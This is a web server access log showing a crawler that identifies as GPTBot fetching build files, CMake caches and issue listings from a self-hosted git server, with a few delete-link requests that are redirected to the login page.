"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12459] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12619] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13534] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13732] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13532] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12777] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13915] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13363] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12463] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11029] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13363] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13335] [Gzip 4.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13364] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13364] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20366] [Gzip 9.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:18:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 15208] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:18:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14041] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:18:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/index.html" -[17/Feb/2026:18:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 11777] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:18:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 21411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:18:14:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:18:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:18:14:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 